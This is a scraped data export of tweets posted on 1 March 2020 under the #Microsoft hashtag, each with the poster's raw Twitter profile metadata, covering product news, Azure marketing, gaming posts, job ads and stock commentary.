    <t>{'id': 986367046526128128, 'id_str': '986367046526128128', 'name': 'Oracletimes Crypto News', 'screen_name': 'oracletimesnews', 'location': 'British Virgin Islands', 'description': 'SHUT DOWN BY ORACLE CORP, SIX YEARS OF PUBLISHING. You can follow our writers them at @cryptogazette and be sure to follow https://t.co/1po3aS0Jl3', 'url': 'https://t.co/1po3aS0Jl3', 'entities': {'url': {'urls': [{'url': 'https://t.co/1po3aS0Jl3', 'expanded_url': 'https://cryptogazette.com', 'display_url': 'cryptogazette.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/1po3aS0Jl3', 'expanded_url': 'https://cryptogazette.com', 'display_url': 'cryptogazette.com', 'indices': [123, 146]}]}}, 'protected': False, 'followers_count': 575, 'friends_count': 515, 'listed_count': 9, 'created_at': 'Tue Apr 17 22:13:24 +0000 2018', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3652, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/996378684390076418/BLnS7yhF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/996378684390076418/BLnS7yhF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986367046526128128/1526389947',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</si>
  <si>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09:25:47 +0000 2020</t>
  </si>
  <si>
    <t>Former Software Engineer, Convicted For Defrauding Microsoft Of Over $10 Million https://t.co/9dfYw8MXKR #bitcoin #microsoft #crypto #cryptocurrency #news #bitcoin</t>
  </si>
  <si>
    <t>{'id': 2272240838, 'id_str': '2272240838', 'name': 'CryptoGazette', 'screen_name': 'CryptoGazette', 'location': 'Baltimore, Maryland', 'description': 'Cryptocurrency and Blockchain News made my writers for readers. No big company, we are a small independent outlet that spreads the latest crypto news.', 'url': 'http://t.co/MYsiAB7ZI4', 'entities': {'url': {'urls': [{'url': 'http://t.co/MYsiAB7ZI4', 'expanded_url': 'http://www.CryptoGazette.com', 'display_url': 'CryptoGazette.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1880, 'friends_count': 463, 'listed_count': 0, 'created_at': 'Thu Jan 02 00:04:16 +0000 2014', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 222, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050505', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226425430456049665/zaCenn0X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226425430456049665/zaCenn0X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2272240838/1581237584',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</si>
  <si>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Sun Mar 01 09:21:51 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 sales are booming as users abandon #Windows7 #MicrosoftWindows #Microsoft https://t.co/0SYTWtce5o https://t.co/ld8tBNDyKj</t>
  </si>
  <si>
    <t>Sun Mar 01 09:05:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Connected Vehicle Platform: trends and investment areashttps://zcu.io/BuFb 
#Microsoft #vehicle #platform #automotive #software #investments #tech #lgelectronics #tomtom #issquared https://t.co/d7W6bljxk6</t>
  </si>
  <si>
    <t>Sun Mar 01 09:00:41 +0000 2020</t>
  </si>
  <si>
    <t>If you are not using any #Cloud-based services from #Microsoft  and do not plan to do so in the near future  you can stop reading now.
#colt #capitalmarkets #office365 #azure #QoS
https://t.co/JGSHL2ANM0</t>
  </si>
  <si>
    <t>{'id': 37904598, 'id_str': '37904598', 'name': 'Murat Turgut', 'screen_name': 'Muri07', 'location': 'Frankfurt, Germany', 'description': 'Sharing news and my experience as a frequent Traveller following the principles of workation', 'url': 'https://t.co/7xqhT9ze88', 'entities': {'url': {'urls': [{'url': 'https://t.co/7xqhT9ze88', 'expanded_url': 'http://www.colt.net', 'display_url': 'colt.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 75, 'listed_count': 7, 'created_at': 'Tue May 05 11:30:19 +0000 2009', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 420,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'http://pbs.twimg.com/profile_images/1224296329486184448/wuNT4VqC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224296329486184448/wuNT4VqC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37904598/1577344071',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</si>
  <si>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09:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Read my Mar 1 #Microsoft Newsletter featuring Microsoft's Bad... https://t.co/4LGNvFD858 Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Sun Mar 01 09:00:13 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/ilAlfqmpe1</t>
  </si>
  <si>
    <t>Sun Mar 01 09:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Very nice &amp;amp; detailed Implementation Guide on #Azure #Sentinel #Insecure #Protocols - Brian Delaney Jon Shectman #Microsoft https://t.co/3f6OHgP3AN #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 08:52:25 +0000 2020</t>
  </si>
  <si>
    <t>Awsome shot i took tonight :) #XboxOne #Microsoft #photography https://t.co/VM3rkSw2Q0</t>
  </si>
  <si>
    <t>{'id': 1187751658387845120, 'id_str': '1187751658387845120', 'name': 'the5kingsofthenorth', 'screen_name': 'the5kingsofthe2', 'location': 'Oshawa, Ontario', 'description': 'Affiliate twitch streamer Father of 2 Youtuber Vloger Gamer Photographer       https://t.co/eATB0poQNL', 'url': 'https://t.co/AK8GT5EroA', 'entities': {'url': {'urls': [{'url': 'https://t.co/AK8GT5EroA', 'expanded_url': 'https://www.twitch.tv/videos/497278652', 'display_url': 'twitch.tv/videos/4972786â€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/eATB0poQNL', 'expanded_url': 'https://youtu.be/M05XVR0_hmY', 'display_url': 'youtu.be/M05XVR0_hmY', 'indices': [79, 102]}]}}, 'protected': False, 'followers_count': 14, 'friends_count': 118, 'listed_count': 0, 'created_at': 'Fri Oct 25 15:24:06 +0000 2019', 'favourites_count': 408, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 157, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1187815568889581569/2ABKzW1K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187815568889581569/2ABKzW1K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1187751658387845120/1583058790',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</si>
  <si>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08:51:34 +0000 2020</t>
  </si>
  <si>
    <t>Top story: @MS_Ignite: 'Dont miss #MSIgniteTheTour, coming to a city near you! The tour brings two days of deep technical training, free! Find an event near you: https://t.co/BEpotwm3W7 ' , see more #Microsoft #Technology event Globally at a city near you in 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 08:50:17 +0000 2020</t>
  </si>
  <si>
    <t>Video of Microsoft Surface Duos Peek feature shows how the dual-screen handset will workhttps://zcu.io/xwuH 
#Microsoft #surface #mobiles #video #office #work #techradar #windows10 #issquared</t>
  </si>
  <si>
    <t>Sun Mar 01 08:42:34 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/dfZBk9YhdN #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/BJt8cm2gmg</t>
  </si>
  <si>
    <t>Sun Mar 01 08:38:54 +0000 2020</t>
  </si>
  <si>
    <t>Are you aware that 40% of Businesses hit by a disaster never reopen? With #MicrosoftAzure get back online within minutes when the unexpected occurs! 
Learn more: https://t.co/WLuclA4EZb
#technology #microsoft #datasecurity #data #exquitech https://t.co/2QJ8ibryhf</t>
  </si>
  <si>
    <t>Sun Mar 01 08:30:47 +0000 2020</t>
  </si>
  <si>
    <t>BBC News - #AI #ethics backed by #Pope and #tech giants in new plan https://t.co/kl4d62BLu6 #IBM #Vatican #Microsoft</t>
  </si>
  <si>
    <t>{'id': 96089691, 'id_str': '96089691', 'name': 'Andrew Davis', 'screen_name': 'davi326', 'location': 'London, England', 'description': 'A personal view of life, music and Hong Kong now from the UK! Wales &amp; London Welsh rugby, and Southampton football supporter!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2734, 'friends_count': 4110, 'listed_count': 989, 'created_at': 'Fri Dec 11 08:52:51 +0000 2009', 'favourites_count': 61790, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 47508,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'http://pbs.twimg.com/profile_images/3110766422/ca92b120b837b6b3b229505490a17395_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3110766422/ca92b120b837b6b3b229505490a17395_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/96089691/1358221238', 'profile_link_color': '0099B9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 08:27:29 +0000 2020</t>
  </si>
  <si>
    <t>How to prevent scripting attacks in #Microsoft Office - #cybersecurity  https://t.co/8nm8rxxmwq via @csoonline</t>
  </si>
  <si>
    <t>Sun Mar 01 08:26:27 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program - The Official Microsoft Blog https://t.co/bnxIgjrPo9 #microsoft</t>
  </si>
  <si>
    <t>{'id': 3097776415, 'id_str': '3097776415', 'name': 'AMRINDER SINGH', 'screen_name': 'amrinder_0412', 'location': 'Dehradun', 'description': 'Web &amp; App Developer | Project Manager | #Tech Enthusiast | #SocialMedia #Marketing Expert |', 'url': 'https://t.co/esW9giX2Sg', 'entities': {'url': {'urls': [{'url': 'https://t.co/esW9giX2Sg', 'expanded_url': 'http://findnerd.com/', 'display_url': 'findnerd.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2221, 'friends_count': 2212, 'listed_count': 1677, 'created_at': 'Thu Mar 19 11:17:44 +0000 2015', 'favourites_count': 7126, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24988,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'http://pbs.twimg.com/profile_images/838742275748413440/heRWCp9l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/838742275748413440/heRWCp9l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3097776415/1432052921', 'profile_link_color': 'FF8100',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</si>
  <si>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08:25:07 +0000 2020</t>
  </si>
  <si>
    <t>Fail to understand why #Microsoft makes it SO DIFFICULT to change network profiles between public and private profiles in #Windows. No matter the version.</t>
  </si>
  <si>
    <t>{'id': 154850286, 'id_str': '154850286', 'name': 'valoryea', 'screen_name': 'valoryea', 'location': 'ashenvale', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 79, 'listed_count': 0, 'created_at': 'Sat Jun 12 11:06:22 +0000 2010', 'favourites_count': 2601, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 746,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'http://pbs.twimg.com/profile_images/837592334124515328/KcBmLtlv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/837592334124515328/KcBmLtlv_normal.jpg',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</si>
  <si>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08:15:21 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 08:10:03 +0000 2020</t>
  </si>
  <si>
    <t>Emerson Electric Co is looking for teammates like you. See our latest #Microsoft job openings, including "Senior Technical Lead", via the link in our bio. #Middlesbrough, England</t>
  </si>
  <si>
    <t>Sun Mar 01 08:06:22 +0000 2020</t>
  </si>
  <si>
    <t>MSFTMechanics: #MicrosoftTeams user tutorial and updates + what's to come in 2020.  Click link to watch: https://t.co/DxI7TRU4MX #Microsoft #Office365 #MSIgnite https://t.co/kx0KOMbNd2</t>
  </si>
  <si>
    <t>Sun Mar 01 08:04:47 +0000 2020</t>
  </si>
  <si>
    <t>make a continuous roll of paper coming out off the to be hooked to computer internet printing for the blind and for flat screen tv #Microsoft https://t.co/sOPNkGHv3D</t>
  </si>
  <si>
    <t>make a continuous roll of paper coming out off the to be hooked to computer internet printing for the blind and for flat screen tv #Microsoft https://t.co/8xEN5cvFYM</t>
  </si>
  <si>
    <t>make a continuous roll of paper coming out off the to be hooked to computer internet printing for the blind and for flat screen tv #Microsoft https://t.co/G2cbAlJPCU</t>
  </si>
  <si>
    <t>make a continuous roll of paper coming out off the to be hooked to computer internet printing for the blind and for flat screen tv #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1103490967, 'id_str': '1103490967', 'name': 'Michael Briggs', 'screen_name': 'ElvisWorkForMe', 'location': 'byron center, Michigan', 'description': 'Elvis Presley is my partner and Paul Allen is my firstpartners. I am Mac of my Apple and owner of Apple.', 'url': 'https://t.co/4rETnIf2Ke', 'entities': {'url': {'urls': [{'url': 'https://t.co/4rETnIf2Ke', 'expanded_url': 'http://www.facebook.com/michaelevansbriggs', 'display_url': 'facebook.com/michaelevansbrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 222, 'listed_count': 1, 'created_at': 'Sat Jan 19 11:37:07 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 490,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'http://pbs.twimg.com/profile_images/1231654780222701568/iLXbTPWC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231654780222701568/iLXbTPWC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103490967/1467803595',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</si>
  <si>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08:04:46 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 08:02:03 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Deep Learning: Convolutional Neural Networks in Python #udemycoupon -https://t.co/XZZCMvhAvX
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Sun Mar 01 08:02:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's new Office Build 12619.20002 for Windows brings new features to #Outlook and #PowerPoint   https://t.co/BfoVK1wIBo by @NonsenseC_UAA</t>
  </si>
  <si>
    <t>Sun Mar 01 08:00:03 +0000 2020</t>
  </si>
  <si>
    <t>.@Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. Read the blog: https://t.co/gUgrzq5u4N</t>
  </si>
  <si>
    <t>{'id': 64102674, 'id_str': '64102674', 'name': 'Sylvia Bautovic', 'screen_name': 'SylviaBautovic', 'location': 'Sydney, New South Wales', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 162, 'friends_count': 103, 'listed_count': 17, 'created_at': 'Sun Aug 09 03:31:02 +0000 2009', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13166,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'http://pbs.twimg.com/profile_images/523217809359118336/kPy-LYAd_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/523217809359118336/kPy-LYAd_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/64102674/1465387776', 'profile_link_color': 'F5ABB5', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '36202A', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 07:57:47 +0000 2020</t>
  </si>
  <si>
    <t>Why glass might be the future of data storage
#Microsoft https://t.co/VuJvvPvOGc</t>
  </si>
  <si>
    <t>{'id': 421173069, 'id_str': '421173069', 'name': '#N95 #N33 #HAND-SANITIZERS #WHATSAPPARAO', 'screen_name': 'RAAJ_GunturianN', 'location': 'WEB', 'description': 'am here for fun!!\nseriousfolks, preachers, teachers, \neconomists pl stay away', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1006, 'friends_count': 1416, 'listed_count': 28, 'created_at': 'Fri Nov 25 16:04:49 +0000 2011', 'favourites_count': 7005, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 49363,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'http://pbs.twimg.com/profile_images/1182142380931072001/1yYnDcxw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182142380931072001/1yYnDcxw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/421173069/1396690143',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</si>
  <si>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07:30:00 +0000 2020</t>
  </si>
  <si>
    <t>What Is #Microsoft #Azure #Stack by Prashant Kumbhar cc @CsharpCorner https://t.co/W4VbO2RUhL https://t.co/BSO2Fcpr46</t>
  </si>
  <si>
    <t>{'id': 241007239, 'id_str': '241007239', 'name': 'C# Corner', 'screen_name': 'CsharpCorner', 'location': 'Philadelphia (USA). New Delhi.', 'description': 'Global community of software and data developers. Learn, Share,', 'url': 'https://t.co/ZKgCN5G5dg', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZKgCN5G5dg', 'expanded_url': 'http://www.c-sharpcorner.com', 'display_url': 'c-sharpcorner.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 126979, 'friends_count': 13, 'listed_count': 2004, 'created_at': 'Fri Jan 21 06:52:01 +0000 2011', 'favourites_count': 6056, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77643,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'http://pbs.twimg.com/profile_images/601645996360138752/JXX6TiZa_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/601645996360138752/JXX6TiZa_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/241007239/1525256855',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</si>
  <si>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Sun Mar 01 07:16:18 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/gjhohQeHH6</t>
  </si>
  <si>
    <t>Sun Mar 01 07:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Only if it's not #Microsoft #Windows they mention platforms  https://t.co/4pWsfW5LKz</t>
  </si>
  <si>
    <t>Sun Mar 01 07:04:41 +0000 2020</t>
  </si>
  <si>
    <t>The past 3 links were all #Microsoft #Windows TCO
...it's always Windows with these #ransomware attacks unless the media mentions another platform (Windows is 'unspeakable'). #corruptMedia</t>
  </si>
  <si>
    <t>Sun Mar 01 07:02:32 +0000 2020</t>
  </si>
  <si>
    <t>Top 10 Most Useful Apps For Students,Teachers,Engineers and many Others. | https://t.co/iekxuteCOo
#Apps #AppStore #student #Students #useful #Microsoft #Microsoft365 #trandin #news #SundayMotivation https://t.co/GYstT2kUiW</t>
  </si>
  <si>
    <t>{'id': 1165812788486463491, 'id_str': '1165812788486463491', 'name': 'M.A.Chauhan', 'screen_name': 'MAChauhan13', 'location': 'India', 'description': 'YouTuber &amp;Blogger', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Mon Aug 26 02:30:00 +0000 2019', 'favourites_count': 75, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1215901274639605760/fg8QQLhA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215901274639605760/fg8QQLhA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1165812788486463491/1566789109',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</si>
  <si>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07:01:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces new datacenter region in Spain, expands partnership with Telefonica https://t.co/8EHk7RpSzS</t>
  </si>
  <si>
    <t>Sun Mar 01 07:01:34 +0000 2020</t>
  </si>
  <si>
    <t>#sap + #Microsoft = #embrace the best choiche to move your  SAP on Cloud. 
The best way trasform your traditional ERP in a succesfull S/4Hana digital platform on #Azure https://t.co/9cx56yAAaZ</t>
  </si>
  <si>
    <t>{'id': 1223015586, 'id_str': '1223015586', 'name': 'Riccardo Salafia', 'screen_name': 'RiccardoSalafia', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 63, 'listed_count': 14, 'created_at': 'Tue Feb 26 21:47:23 +0000 2013', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 367,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'http://pbs.twimg.com/profile_images/607819926045396992/kIE4kh3o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/607819926045396992/kIE4kh3o_normal.jpg',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</si>
  <si>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07:00:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Teams is First Office App for #Linux
 #slack #Microsoft #Build5Nines
https://t.co/B0j1m4bFeE</t>
  </si>
  <si>
    <t>Sun Mar 01 06:58:01 +0000 2020</t>
  </si>
  <si>
    <t>Unmatched #security and compliance, consistent hybrid #cloud, cost-effective - are reasons to choose #Azure
https://t.co/F7J082528w
#Windows #SQLServer #Microsoft #madeiradata https://t.co/r6xiB5ltvE</t>
  </si>
  <si>
    <t>Sun Mar 01 06:55:42 +0000 2020</t>
  </si>
  <si>
    <t>Your Phone will soon allow you to drag and drop files https://t.co/au26ED3MgX #microsoft #feedly</t>
  </si>
  <si>
    <t>Sun Mar 01 06:54:15 +0000 2020</t>
  </si>
  <si>
    <t>#Vatican confirms 
#PopeFrancis and 
two aides test 
#positive for #Coronavirus https://t.co/OCgN7FitsE 
#bigdata 
#ItalyCoronavirus 
#ZURich #Espana 
#milano @Chidambara09 #linux #china #usa #google #youtube 
#apple
#Microsoft
#Celebrity #model #actress #movies #pop #fashion</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</si>
  <si>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927176,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</si>
  <si>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06:53:58 +0000 2020</t>
  </si>
  <si>
    <t>Who should write global #AI rules? #Vatican calls for AI #ethics backed by #IBM and #Microsoft. https://t.co/Qi8gLWvFDh</t>
  </si>
  <si>
    <t>{'id': 1201950257698836480, 'id_str': '1201950257698836480', 'name': 'AI for Peace', 'screen_name': 'AI4Peace', 'location': 'San Francisco ', 'description': 'We create a future in which AI benefits peace, security and sustainable development and where diverse voices influence creation of AI and related technologies.', 'url': 'https://t.co/HNzwC0v1HD', 'entities': {'url': {'urls': [{'url': 'https://t.co/HNzwC0v1HD', 'expanded_url': 'http://www.aiforpeace.org', 'display_url': 'aiforpeace.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 432, 'listed_count': 1, 'created_at': 'Tue Dec 03 19:45:19 +0000 2019', 'favourites_count': 128, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 125, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201965105270779904/3H3Qqo0G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201965105270779904/3H3Qqo0G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1201950257698836480/1578536388',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</si>
  <si>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06:52:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft rolls out new system icons to all Windows 10 users https://t.co/ynpcCHS0S3 #microsoft #feedly</t>
  </si>
  <si>
    <t>Sun Mar 01 06:48:50 +0000 2020</t>
  </si>
  <si>
    <t>FBI says ransomware victims paid over $140 million to attackers https://t.co/vqEoFpJsTj #microsoft #feedly</t>
  </si>
  <si>
    <t>Sun Mar 01 06:37:25 +0000 2020</t>
  </si>
  <si>
    <t>LIVEPlaying some #arkgenesis on #win10. Come hang out! https://t.co/8Rr9rmAChI
#gaming #xbox #pc #playstation #microsoft #pcgaming #gameroom #arksurvivalevolved... https://t.co/grYjPT746p</t>
  </si>
  <si>
    <t>{'id': 895165982087532545, 'id_str': '895165982087532545', 'name': 'Team 6ix Gaming', 'screen_name': 'OfficialTeam6ix', 'location': 'www.team6ixgaming.com', 'description': 'A gaming community built by gamers for gamers! Join the family today! "I\'ve got your 6ix" | Sponsored by: @Soardogg', 'url': 'https://t.co/Nwylcsr3bz', 'entities': {'url': {'urls': [{'url': 'https://t.co/Nwylcsr3bz', 'expanded_url': 'https://twitch.tv/officialteam6ix', 'display_url': 'twitch.tv/officialteam6ix', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 128, 'listed_count': 2, 'created_at': 'Wed Aug 09 06:12:56 +0000 2017', 'favourites_count': 635, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 599,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'http://pbs.twimg.com/profile_images/898768229568438272/7f0U5tvq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/898768229568438272/7f0U5tvq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/895165982087532545/1503118063',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</si>
  <si>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06:28:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Stock Falls 5% https://t.co/jJKhM8cUf0</t>
  </si>
  <si>
    <t>Sun Mar 01 06:26:36 +0000 2020</t>
  </si>
  <si>
    <t>@Azure Sunday tip:
#Microsoft #microsoftazure #Azure #linkedinlearning
https://t.co/9cY2PWLWXt</t>
  </si>
  <si>
    <t>Sun Mar 01 06:17:09 +0000 2020</t>
  </si>
  <si>
    <t>Who remembers the psychological warfare that was chesty from the Fable franchise? I miss that series so much. #RPG #XBox #Microsoft https://t.co/T5mkTspVag</t>
  </si>
  <si>
    <t>{'id': 998263426181943298, 'id_str': '998263426181943298', 'name': 'ðŸ€â˜˜ï¸ThoughtBubbleTVâ˜˜ï¸ðŸ€', 'screen_name': 'ThoughtBubbleTV', 'location': '', 'description': 'I stream and make YouTube videos about Psychology in Gaming | Legend of Zelda | PokÃ©mon | Kingdom Hearts', 'url': 'https://t.co/PukAIYOiTk', 'entities': {'url': {'urls': [{'url': 'https://t.co/PukAIYOiTk', 'expanded_url': 'https://www.youtube.com/c/thoughtbubbletv', 'display_url': 'youtube.com/c/thoughtbubblâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 158, 'listed_count': 0, 'created_at': 'Sun May 20 18:05:22 +0000 2018', 'favourites_count': 3327, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2344, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1157495149217419266/7sAP4-WF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157495149217419266/7sAP4-WF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/998263426181943298/1550385011',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</si>
  <si>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06:16:27 +0000 2020</t>
  </si>
  <si>
    <t>Last 3 days to register for the 2020 #Brisbane #Global #Integration #Bootcamp next Saturday! Don't miss out on the best annual #Microsoft integration event in QLD! https://t.co/VbyYYx8y8X #msbts #logicapps @logicappsio #gib2020 #globalintegration</t>
  </si>
  <si>
    <t>{'id': 408836214, 'id_str': '408836214', 'name': 'Brisbane Azure UG', 'screen_name': 'BrisbaneAzureUG', 'location': 'Brisbane, Australia', 'description': 'Brisbane community of Microsoft Azure enthusiasts. Check out our videos on YouTube: https://t.co/kbeMaOwcfg', 'url': 'http://t.co/FKMl9kiZNK', 'entities': {'url': {'urls': [{'url': 'http://t.co/FKMl9kiZNK', 'expanded_url': 'http://www.meetup.com/Brisbane-Azure-User-Group/', 'display_url': 'meetup.com/Brisbane-Azureâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/kbeMaOwcfg', 'expanded_url': 'http://bit.ly/BAUGYouTubeChannel', 'display_url': 'bit.ly/BAUGYouTubeChaâ€¦', 'indices': [84, 107]}]}}, 'protected': False, 'followers_count': 281, 'friends_count': 2, 'listed_count': 28, 'created_at': 'Wed Nov 09 23:20:41 +0000 2011', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1639400134/Profile_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1639400134/Profile_normal.png',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</si>
